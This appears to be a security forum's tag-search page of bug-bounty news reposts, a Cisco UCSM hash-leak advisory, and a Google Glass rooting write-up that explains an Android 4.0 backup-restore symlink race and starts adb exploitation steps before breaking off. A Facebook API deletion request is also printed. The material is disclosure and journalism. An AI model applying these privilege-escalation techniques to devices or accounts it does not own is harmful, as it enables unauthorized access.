Jump to content

Search the Community

Showing results for tags 'bug'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Cumparaturi online's Test
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 13 results

  1. Nu stiu daca am nimerit categoria care trebuie, dar m-am gandit ca e mai degraba ceva pentru incepatori(in bug bounty). Am vazut in ultimul mai multe exemple de oameni/useri care spuneau ca isi castiga existenta si ca traiesc doar din bug bounty si chiar vroiam sa va intreb daca e posibil sa ai un venit bun din bug bounty si daca conteaza foarte mult cat timp dedici pentru asta. Chiar este ceva din care poti trai, daca faci asta sa zicem constant ca si cum ai avea un job de 40 ore/sapt? Si ma refer in special la modul de sa traiesti asta nu sa faci din pasiune/curiozitate/interes. As aprecia foarte mult daca ati da si exemple de care stiti, sau eventual prieteni/cunostinte/chiar voi care au facut/fac asta. Mersi!
  2. Salutare, Vreau sa fac share la un playlist pe care l-am urmarit in ultima vreme, legat de bug bounty hunting. Recomand atat incepatorilor cat si celor cu exprienta, pentru ca oricand se poate invatat ceva nou, sau pot aparea alte idei. Peter Yaworski, autorul cartii Web Hacking 101(o "culegere" cu cele mai intalnite tipuri de vunerabilitati explicate mai pe scurt, insotite de exemple descoperite "in the wild" in ultimii ani), face o serie de interviuri cu unii dintre cei mai buni bug bounty hunters la ora actuala, regasiti in topul HackerOne sau Bugcrowd. In aceste interviuri aflam cum a inceput fiecare, ce metode si procedee folosesc, si multe altele. Fiecare interviu e diferit, fiecare invitat are stilul si modalitatile lui, asa ca sunt multe lucruri de invatat. Avand in vedere ca majoritatea tintelor pe care le abordeaza au deja o echipa de securitate in spate care gasesc majoritatea problemelor, abilitatea de a construi atacuri creative si "outside the box" e esentiala pentru a gasi probleme critice in sisteme. Playlist-ul aici:
  3. Foxing the holes in the code Mozilla has more than doubled the cash rewards under its dusty bug bounty to beyond $10,000. The browser baron has increased the reward for high-severity bugs such as those leading to remote code execution without requiring other vulnerabilities. Engineer Raymond Forbes says the bounty had not been updated in five years and had fallen out of step. "The amount awarded was increased to $3000 five years ago and it is definitely time for this to be increased again," Forbes says. "We have dramatically increased the amount of money that a vulnerability is worth [and] we are moving to a variable payout based on the quality of the bug report, the severity of the bug, and how clearly the vulnerability can be exploited. "Finally, we looked into how we decide what vulnerability is worth a bounty award." Mozilla previously awarded $3000 for critical vulnerabilities that could seriously endanger users. It paid small amounts for only some moderate vulnerabilities that will under the revamp now attract up to $2000. The Firefox forger also launched its security bug hall of fame which is a common and important component of bug bounty programs, and will open a version for web and services. Bug bounties are enjoying a boom of late with many large organisations opening in-house and outsourced programs to attract security vulnerability researchers. The schemes promise to increase the security profile of organisations while providing hackers with an opportunity to practice their skills and earn cash or prizes without the threat of legal ramifications. Programs must be properly set up prior to launch including clear security policies and contact details posted to an organisation's web site, and strong communication between IT staff and bug hunters. Hackers will often drop unpatched vulnerabilities to the public domain if an organisation fails to respond or refuses to fix the bugs. Source
  4. Usr6

    The Bug

    https://www.sendspace.com/file/8q1lib The bug killers: 1. @Byte-ul 3. 4. 5.
  5. Security bod Kamil Hismatullin has disclosed a simple method to delete any video from YouTube. The Russian software developer and hacker found videos can be instantly nuked by sending the identity number of a video in a post request along with any token. Google paid the bug hunter US$5000 for the find along with $1337 under its pre-emptive vulnerability payment scheme in which it slings cash to help recognised researchers find more bugs. "I wanted to find there some CSRF or XSS issues, but unexpectedly discovered a logical bug that let me to delete any video on YouTube with just one request," Hismatullin says. "... this vulnerability could create utter havoc in a matter of minutes in [hackers'] hands who could extort people or simply disrupt YouTube by deleting massive amounts of videos in a very short period of time." Hismatullin says Google responded quickly when he reported the bug Saturday. He says he spent seven hours finding the bugs and resisted the near overwhelming urge to "clean up Bieber's channel". Google's Vulnerability Research Grants is described as cash with "no strings attached" that allows known security bods to apply for US$3133.70 to begin bug hunting expeditions. The search and service giant handed out some $1.5 million last year to bug hunters for reporting vulnerabilities Source+video
  6. Subject: Cisco UCSM username and password hashes sent via SYSLOG Impact: Information Disclosure / Privilege Elevation Vendor: Cisco Product: Cisco Unified Computing System Manager (UCSM) Notified: 2014.10.31 Fixed: 2015.03.06 ( 2.2(3e) ) Author: Tom Sellers ( tom at fadedcode.net ) Date: 2015.03.21 Description: ============ Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 sends local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster then each member will transmit the data. SYSLOG Example ( portions of password hash replaced with <!snip!> ): Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd Vulnerable environment(s): ========================== Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment including Fabric Interconnects, B- Series blades servers and the related blade chassis. C-Series (non-blade) servers can also be managed. These solutions are deployed in high performance / high density compute solutions and allow for policy based and rapid deployment of resources. They are are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity. Software Versions: 1.3 - 2.2(1b)A Hardware: Cisco 6120 XP, 6296 UP SYSLOG Configuration: - Level: Information - Facility: Local7 - Faults: Enabled - Audits: Enabled - Events: Disabled Risks: ====== 1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment and this information represents an exposure. 2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM. 3. SYSLOG is transmitted in plain text. Submitter recommendations to vendor: ==================================== 1. Remove the username and password hash data from the SYSLOG output. 2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system. 3. Add support for TLS wrapped SYSLOG output. Vendor response/resolution: ========================== After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development where it was treated as a standard bug. Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than it was in progress with an undetermined release date. On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text: --- Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours. --- For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed. Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match. The following documents remain available: Public URL for Defect: https://tools.cisco.com/quickview/bug/CSCur54705 Bug Search (login required): https://tools.cisco.com/bugsearch/bug/CSCur54705 Release notes for 2.2(3e): http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634 Associated vendor IDs: PSIRT-1394165707 CSCur54705 Timeline: ============ 2014.10.30 Reported to psirt@cisco.com 2014.11.04 Response from PSIRT, assigned PSIRT-1394165707 2014.11.06 Follow up questions from Cisco, response provided same day 2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705. 2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status. 2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time 2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission 2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc. 2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission 2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e) Reference: 1 - http://tools.cisco.com/security/center/publicationListing.x 2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640 ( CVE-2014-8009 ) Source
  7. Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program announced today and launched last month operates through HackerOne used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including cross-site scripting; privileged cross-site request forgery; server-side code execution; authentication or authorisation flaws; injection vulnerabilities; directory traversal; information disclosure, and significant security misconfiguration. "In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieters Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first in for reporting a flaw and offer Adobe "reasonable" time to fix the flaws prior to public disclosure, Ockers says. Smaller vulnerabilities such as the following are excluded: Logout and other instances of low-severity cross-site request forgery Perceived issues with password reset links Missing http security headers Missing cookie flags on non-sensitive cookies Clickjacking on static pages The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published July he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services. "A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends bounties should be published in an obvious location on websites, preferably located with the /security subdomain, and sport a dedicated security contact who is well-briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously-porous products have so many bugs that a cash bounty could dent the bottom line. Source
  8. WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet and serious vulnerabilities in the platform have not been hard to come by lately. But there’s now a new bug that’s been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites. The issue lies in the fact that WordPress doesn’t contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response. “On June 25, 2014 I opened a ticked on WordPress’s issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present,” he said in an advisory on Full Disclosure. “For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time.” The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user’s account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted. Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it. “There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years. Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it’s acceptable for merging) is a serious gain over a userland RNG,” he said by email. But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers. “WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That’s not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever,”Arciszewski said. WordPress officials did not respond to questions for this story before publication. Source
  9. This week, a researcher named Laxman Muthiyah discovered up a bug that let him delete any photo album on Facebook, and walked away with $12,500 for his trouble. The bug targeted Facebook's Graph API, which lets users delete their own photo albums with a single command, corresponding to the "delete album" button. Because of a mistake on Facebook's part, that request could potentially target any album on the network that the user had access to view, as long as the user was logged in through the mobile version of the API. After some troubleshooting, Muthiyah settled on the following request as the silver bullet for deleting any album off the network: Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token= facebook_for_android_access_token Muthiyah reported the vulnerability to Facebook and the company wrote back in just two hours, saying the bug was fixed and offering him $12,500 through Facebook's bug bounty program. Presumably, the fix was simple — altering the mobile app permissions was likely enough — but it's a reminder of how much damage even a small bug can do. Sophos has already speculated that the bug could have been used to delete every photo on Facebook, but such an attack would be unlikely, since the bug does not seem to have allowed for access to any private accounts. Luckily, Muthiyah did the right thing and reported the bug, walking away with a sizable reward. "We received a report about an issue with our Graph API and quickly fixed it within two hours of verifying the claims," said a Facebook representative. "We’d like to thank the researcher who reported the issue to us through our bug bounty program." Sursa: http://www.theverge.com/2015/2/12/8026159/facebook-photo-album-vulnerability-bug-bounty
  10. HackerOne, the popular security response and bug bounty platform, rewarded a researcher with with a $5,000 bounty for identifying a severe cross-site scripting (XSS) vulnerability. HackerOne hosts bug bounty programs for several organizations, but the company also runs a program for its own services. So far, HackerOne has thanked 54 hackers for helping the company keep its services secure, but Trello developer Daniel LeCheminant is the first to find a flaw rated “severe.” The researcher discovered that he could insert arbitrary HTML code into bug reports and other pages that use Markdown, a markup language designed for text-to-HTML conversions. “While being able to insert persistent, arbitrary HTML is often game over, HackerOne uses Content Security Policy (CSP) headers that made a lot of the fun stuff ineffective; e.g. I could insert a <script> tag or an element with an event handler, but it wouldn't run because these unsafe inline scripts were blocked by their CSP,” LeCheminant explained in a blog post. “Fortunately (for me) not all browsers have full support for CSP headers (e.g. Internet Explorer 11), so it wasn't hard to make a case that being able to run arbitrary script when someone attempted to view a bug that I'd submitted qualified as something that ‘might grant unauthorized access to confidential bug descriptions’,” he added. An attacker couldn’t have exploited the vulnerability to run arbitrary scripts, but as the expert demonstrated, the bug was serious enough. LeCheminant managed to change visual elements on the page (e.g. color of the links) because HackerOne’s CSP allows inline styles, and even insert an image into his submission. According to the researcher, an attacker could have also inserted other elements, such as text areas, and he could have redirected visitors of the page to an arbitrary website by using the meta refresh method. When users click on links found in bug reports, they are redirected to a warning page where they are informed that they are about leave HackerOne and visit a potentially unsafe website. However, by leveraging the XSS found by LeCheminant, a malicious actor could have bypassed the warning page and take users directly to a potentially harmful site. The vulnerability was reported just three days ago and it was resolved by HackerOne one day later. Source: securityweek.com
  11. Google is offering grants worth up to $3,000 to investigate suspected security flaws as a part of a new "experimental" initiative. Google security engineer Eduardo Vela Nava announced the move in a blog post, promising to offer further incentives for researchers to investigate suspected problems that they would otherwise ignore. "Today we're rolling out a new, experimental programme: Vulnerability Research Grants. These are upfront awards that we will provide to researchers before they ever submit a bug," he explained. "We'll publish different types of vulnerabilities, products and services for which we want to support research beyond our normal vulnerability rewards. "We'll award grants immediately before research begins, with no strings attached. Researchers then pursue the research they applied for, as usual. There will be various tiers of grants, with a maximum of $3,133.70." Google also announced plans to expand its existing bug bounty programme to include flaws in mobile applications. "Also starting today, all mobile applications officially developed by Google on Google Play and iTunes will now be within the scope of the Vulnerability Reward Programme," read the post. Google has been a constant supporter of bug bounty schemes, and announced reforms to its programmes in 2014. Google tripled Chrome bug bounty payments to $15,000 in October prior to launching the Project Zero initiative. Project Zero was launched in July 2014 with the apparent intention of speeding up companies' patch release schedules. The team of researchers does this by initially disclosing flaws privately to the firms responsible and giving them 90 days to release a fix before making the research public. The project was criticised earlier this year for the public disclosure of bugs in Microsoft's Windows and Apple's Mac OS X operating systems. Nava credited the schemes as a success despite the controversy. He revealed that Google paid researchers more than $1.5m for discovering over 500 bugs last year. Source
  12. A few days ago, I posted to Twitter a picture I took of a Google Glass unit running software that I had modified. I did this while in the Bay Area after picking it up from Google's headquarters in Mountain View. I was unable to provide many more details at the time, as I first was busy driving home, and then became caught up responding to a large amount of feedback caused by press surrounding my picture. My motivation for posting that picture was, in my mind, fairly simple: I have a large audience of users who are interested in device customization, particularly stemming from the idea of modifying the code of popular consumer devices (such as the iPhone). Some developers I work with had posted the night before that I was looking at Glass, and my post was an update on what I had done. The context for many reporters who saw what I posted was somewhat different, due to statements made by the Executive Chairman of Google the day before that Glass would be a relatively closed platform for developers. In contrast, engineers, developer advocates, and technical leads at Google have been trying to make it clear that Glass is designed to be an open platform. The result was difficult to navigate. In this article, I describe what I did, why I did it the way that I did it, and how people who own their own Glass can do the same thing. In the process, I explain the mechanism behind a security exploit in Android 4.0 that had been disclosed last September (this is the bug I used to modify Glass, not fastboot). Finally, I take a look at some important considerations on the security of this device that I find quite concerning. What is Google Glass? Glass is a new first-party hardware product designed by Google. It is a head-mounted computer that sits on your face very similarly to a pair of glasses (resting on your ears and your nose). It has a camera, a display, a touchpad (along the right arm), a speaker, and a microphone. The display is projected into your right eye using a prism, and sound is played into your eardrum from above your ear via bone conduction. While Glass looks very different from any other device, it runs an operating system that is now very common: Android. That said, it isn't quite the same as the Android that you see on phones and tablets: many of the higher-level applications are not present and have been replaced with the Glass UI (which is controlled by voice and gestures). (This is analogous to how the AppleTV runs a modified UI on top of iOS.) Glass costs $1500, but is not yet generally available. Currently, Glass is only available to a limited number of "early adopters" as part of something they call the "Glass Explorer Program". The device currently being sold is the "Glass Explorer Edition"; one would expect that Google will learn from peoples' reactions to it and make modifications for the final units put into general release. How did you get your hands on one? Recently, Google ran a contest on Twitter where people were asked to post messages using the hashtag #ifihadglass that had a cool idea for what they could do if they were given a device (winners were not just given a device, though: they still had to pay $1500, which according to an article published by Android and Me, many did not realize). (Sadly, as described in a post on Forbes, not all entries were very pleasant.) While my post on Twitter from a few days ago used the #ifihadglass hashtag (making a joke that "#ifihadglass I would jailbreak it and modify the software"), I had not ever actually entered this contest. I explain this, because at least a few people on Saturday thought that by posting that message (or by modifying the software on the device at all) I was violating the purpose and spirit of the competition. Instead, at Google I/O 2012, Google was allowing any attendee to "pre-order" one. While they couldn't accept your money that far in advance (a restriction enforced by credit card companies), attendees of the conference who signed up would be given the opportunity to buy one (for $1500) whenever it first became available, something Google expected to happen sometime in the next year (before I/O 2013). The one restriction was that you had to have a "business purpose", as they did not have the required FCC licenses in order to distribute the product to "consumers". They were not requiring you to use it for development, and I made it clear to them at the time that I did not intend to develop for the device normally. My business (SaurikIT) builds tools to modify software, and I'm always looking for more test devices. Can developers write apps for it? Yes: Google provides an official way to develop software for use with Glass (which they call "Glassware"): the "Mirror API". Unlike with other mobile devices (such as Android phones and tablets, or devices from Apple running iOS), software for Glass is not run on the device itself: instead, the developer is given access to a web-based API that allows them to integrate over the Internet with the user's Glass. Further, Eric Schmidt, the Executive Chairman of Google, as reported on Thursday in a release by Reuters, stated in a talk at Harvard that Google was intending to have a closed software ecosystem for Glass, where Google will have to pre-approve all software offered to users by developers. "It's so new, we decided to be more cautious," Schmidt said. "It's always easier to open it up more in the future." Looking back, two weeks ago Google released guidelines for developers of Glassware, which an article from the New York Times goes so far as to say "emulates Apple in restricting apps". "To begin, developers cannot sell ads in apps, collect user data for ads, share data with ad companies or distribute apps elsewhere. They cannot charge people to buy apps or virtual goods or services within them." It is this context that must then be kept in mind when reading the numerous articles that hit the press on Friday regarding my demonstration of a Glass running modified software: if you were wondering why the press ran so far and so hard, turning it into what seemed like a major story, it is because just the day before it had come straight from the top of Google that Glass would not be an open platform. Now, that said, Google generally likes open hardware, and it seems to me like Glass will not be an exception: at least the units currently being distributed as part of the early-access program have features (such as "Debug Mode") that demonstrate they are intended to be relatively-open devices. This was made clear by me to reporters I spoke with, and frankly the stories largely (but not entirely) got this right. What is the "Debug Mode" feature? So, when I picked up my unit, there were two "Glass Guides" who walked me through its use. At one point, they asked me to open Settings and select Bluetooth, so we could pair it with my iPhone. While there, I became curious about the "Device Information" menu, under which I found a setting "Debug Mode". The option had the Android logo next to it, and could be turned "on" and "off" (it was off). I asked the primary guide what it did (specifically asking whether it would give me access to the device via adb, the Android Debugging tool), and she told me that she wasn't certain; I believe she said that she hadn't seen that option before (although I don't quite remember; she may have just not known what adb was). I turned the feature on (of course), which seemed to make her somewhat uncomfortable. The second guide was slightly more technical, so when he returned a little later I asked him about the Debug Mode option. The reaction was interesting: he kind of looked at me, somewhat confused, and asked "wait, what version of the software does it report in Settings"? When I told him "XE4" he clarified "XE4, not XE3", which I verified. He had thought this feature had been removed from the production units. After a quick explanation that he must have not paid enough attention to the release notes, he told me that with Debug Mode enabled you could use a three-finger tap on the control area to file a bug report with the Glass team (while doing so, he demonstrated the action, which had a humorous result of him accidentally sending a bug report himself, which he then seemed somewhat abashed about). In fact, the Debug Mode option is the equivalent of the typical Android "Enable USB Debugging" option: it allows you to connect to the device over USB via adb. This tool allows you to manage the applications installed on the device, watch a detailed log of events occurring on the device, and get access to a shell (much like the Command Prompt on Windows, or even more closely, Terminal on Mac OS X). Some people stated that adb allows one to get full access to the device, particularly due to a few articles that mentioned a command "adb reboot-bootloader". In fact, adb itself is fairly restricted. What that command does is reboot the unit; when it boots back up, it starts into a special mode known as "fastboot". (On most Android devices, this is accomplished by holding down some buttons during boot.) What is fastboot (and "oem unlock")? The first piece of software that runs on devices like this is the "bootloader", a fairly small piece of software stored directly inside the device that has the job of loading the operating system that will be used and starting it. The default bootloader for Android provided by Google is called "fastboot". Some devices provide their own alternative bootloader; some of those support fastboot as a second option. When you boot in the fastboot mode, rather than continuing into the operating system, fastboot stops and makes itself available over USB. You can control the bootloader using a program provided by Google that is also called "fastboot". This allows low-level device access. (For people reading this from my iOS audience, it is reasonable to think of fastboot as the functional equivalent of "DFU mode".) One of the commands available via fastboot is "oem", which allows manufacturers to provide custom commands; everything after "fastboot oem" is sent to the device without modification. By default, fastboot is "locked", and only a subset of the available commands can be used. Some devices provide oem commands that will unlock the bootloader (possibly requiring a password or other secret data). The most common command to unlock the bootloader is simply "unlock". On most devices that provide this command, a menu will be displayed that explains that by unlocking the bootloader your warranty will be voided, and that it is disrecommended by the manufacturer. It also has a side effect: it will delete all of your personal data stored on the device (I mention this in more detail later, and explain why). In order to enforce that your warranty has been voided (as well as to make it more clear to the user that something has changed), devices that have unlocked bootloaders will also generally display some kind of image making this clear as the device boots. I like to call this image the "unlock of shame". I am not certain whether Glass has such an image, but I would presume it to be similar to other devices. Once the bootloader is unlocked, you can use it to get full access to the device, in particular using "fastboot flash" to install different or modified operating systems. In a way, having access to an unlocked bootloader is the be-all-and-end-all of power. The things I wanted to accomplish require access to the "root" (administrator) account on the device, and fastboot is powerful enough to make that happen. However, I did not use fastboot; in fact, the bootloader on my device is still locked (and I would prefer not having to unlock it, for reasons more complex than "it would delete all of my data", which I also discuss in more detail later). Regardless, the truth of the matter is that while fastboot technically allows you to get root on Glass, as of Thursday night it was not an easy or viable option for various reasons. Why didn't you just use fastboot? In order to get much value out of fastboot, you need to have an operating system "image" you can ask it to either store for later use or immediately boot. This image is similar to a bootable CD that you might place in your computer: it is a self-contained operating system. In the case of Linux, this will be a "kernel" (which includes any required device drivers) and, embedded inside of it, a filesystem. In order to make one of these, you need a kernel that is compatible with the device. By far the easiest way to get a working kernel is to just dump one from a working device. However, fastboot actually doesn't provide this as a feature: you have to do it after the device has already booted, and this requires you to already have root access. In essence, this is a catch-22 situation: we need root to get root. Sometimes the manufacturer of a device provides a set of "stock images" (which is really convenient if you accidentally mess up your device: you can then easily restore it to a pristine from-the-manufacturer state via fastboot). This isn't common enough, but Google normally does release stock images for all of their Google-branded devices; they have not, however, done it for Glass. They may very well do so later on. The other option is to construct our own kernel: Linux is open source, so anyone can, without that much difficulty, compile their own from scratch. However, you need to know what kinds of hardware components (both obvious things such as the kind of CPU, as well as subtle things like the model of the network card) the device is built out of, along with any other hardware-specific configuration information. What kept you from building a kernel? The easiest way to get this required information is to ask your device to provide it for you: Linux provides a way for the full configuration to be included in an easy-to-find manner (a virtual file, /proc/config.gz). Google, however, disabled this feature on Glass, so the fact that we have access to the device via adb is unhelpful for this purpose. Alternatively, one can get this information from the manufacturer. It is actually a requirement that the manufacturer of a device using the Linux kernel provide this information (along with the full source code for the kernel, as modifications may have been made), but Google had not yet done this as of Friday morning (when I posted the picture of a modified Glass). It was not posted until Saturday (after which point many people didn't realize the delay). This is actually quite common, and honestly I do not begrudge them at all for the delay: Apple is much worse about compliance, and only in a couple cases have I ever felt the need to complain. In this case, according to someone from Google in charge of "open source compliance": "The GPL source should have been posted already (13 days ago, in fact), but it looks like the person who was to do it went on vacation first." Of course, we could always attempt to guess-and-check our way to a compatible kernel, but this is hard and somewhat risky. I asked Koushik Dutta, the developer of ClockworkMod (a very popular recovery image used on rooted Android devices) if he had any tips on how to proceed in this situation; he said he "definitely wouldn't want to try to hack and slash at putting a kernel together for some random device". Many people were rather confused by this (including a technical lead at Google who wrote "we intentionally left the device unlocked so you guys could hack it and do crazy fun shit with it. I mean, FFS, you paid $1500 for it... go to town on it"): the source code is supposed to be available, and so an unlocked bootloader should be sufficient. In this situation, however, it simply wasn't practical to use this to get root. How did you actually get root access? At this point, I could have simply complained to Google in order to obtain the source code for the kernel. However, I expected that would take days (Google actually ended up posting the code within hours on Saturday, but that was under rather large public pressure), and had no guarantee of even being successful (I am not certain the GPL applies to restricted releases; Glass isn't really publicly available yet; IANAL <- edit: a "Licensing & Compliance Manager" from the FSF reached out to me to clarify that "yes, the terms of the GNU GPL still apply"). To be very explicit: I was not bothered by this, nor did I complain about it on Twitter; if anything, I found it to be an interesting challenge. I like hacking on devices, and despite having an unlockable bootloader, it turns out that Glass posed a challenge to get the access required to modify its software. (Besides, as described in more detail later, I generally prefer to not unlock my bootloader.) So, I decided I'd look to see if any known exploits would work on the device: Android devices tend to not get updates very quickly and often come from the manufacturer running an old version of the operating system. This has allowed many devices that might otherwise be locked down to get hacked: universal exploits that work on every device running particular versions of Android have been surprisingly common. Last August, I actually had implemented an exploit for Android (mempodroid, using the mempodipper exploit described by Jason A. Donenfeld, attacking a bug discovered by Jüri Aedla). Sadly, it was fixed in Android 4.0.3 (Glass runs 4.0.4). Thankfully, a Google search for "Android 4.0 root" turned up an article published by The Next Web from September about an exploit that affected all versions of Android 4.0.x. This exploit, which doesn't have a name (and so will be referred to indirectly), was developed by a hacker named Bin4ry. It isn't clear that it is "his exploit", though: he credits the idea to "Goroh_kun and tkymgr". It is Bin4ry's implementation, however, which I downloaded and analyzed: I needed to figure out how this exploit worked, to see if it would work on Glass, and if not to adapt it until it would. How does this exploit work? The way it works is, humorously to me, somewhat similar to one of the first stages of the evasi0n exploit used to jailbreak iOS 6: it involves something called a "symlink traversal" that can be triggered while restoring a backup to the device. In the case of evasi0n, you constructed, modified, and restored multiple backups, one to setup the symlink, and the second to do the traversal: here, we rely on a "race condition". So, on Android, you can use adb to take a backup of the personal data associated with any installed package, and then later restore that data. When you restore the data, it first deletes all of the personal data that is already there, and then it extracts the data that is stored in the backup. The backup itself is a compressed "tar" file (conceptually similar to a zip file, for people who haven't heard of tar). To explain, a "symlink" (short for "symbolic link") is a special kind of file that isn't really a file at all: it is like a sign post that tells the computer to go use a different file instead. If you have a directory or folder that is a symlink to a different one, when you go into that folder you will end up in the one that it refers to. If the backup is then extracted on top of a symlink, the files will end up in the wrong place. We can't place this symlink ahead of time, because the first step is to delete the old data. We also can't place it into the backup itself (as is done with evasi0n) because even though that is possible in a tar file, the restore system on Android doesn't know what to do when it finds that special kind of file in the backup data. We thereby need to drop the symlink while the restore process is taking place. We call this a "race condition", because we now have two activities that are racing to the same place, and depending on which one gets there first (the restore process, or our attempt to place the symlink), we may get either intended or problematic behavior. To make the timing more deterministic (ensuring we always win), we make the backup "very large", slowing down the process of the restore, giving us more time. The file we try to overwrite with our backup is /data/local.prop, which is stored on a part of the device that can be modified, but only if you are root. Inside this file, the goal is to place "ro.kernel.qemu=1", which will make the operating system believe that it is running not on real hardware, but instead on the emulator shipped by Google for developers to test their apps more easily (a program called "qemu"). To make this work, we need to find a package that both allows its data to be restored from a backup (packages can opt out) as well as is owned by root (so that the backup is extracted as root, which is required in order to write to /data/local.prop). On most Android devices, the Settings application fits the bill. On Glass, there is no Settings, but we got lucky: the Glass Logging service satisfies both criteria. If you do not own Glass, or are not interested in the technical howto, I encourage you to skip the following section and continue below. How can I use this exploit myself? This exploit is simple enough that you can pull it off with just a couple files, and without any specialized tooling. In order to proceed, you need only have the Android SDK (which comes with a copy of the adb utility) installed on your computer, and two files from me: exploit.ab (the exploit payload for use with adb restore) and su. As this process involves doing a restore of the personal data stored for the Glass Logging service, we must first do a backup of any data that we already have stored for it (as it will be deleted). We do this using adb's backup command, to which we will pass the name of a file to store the backed up data and the name of the package which we want to back up. In this case, that is "com.google.glass.logging". $ adb backup -f backup.ab com.google.glass.logging When we run this command, Glass will show a dialog (through the prism, so make certain you are wearing your device) verifying that we want to make this backup and asking if we would like the backup to be password protected. In this case, you should just use your Glass's touchpad to scroll to "Back up my data", and select it (by tapping). The command on your computer will then complete. Our 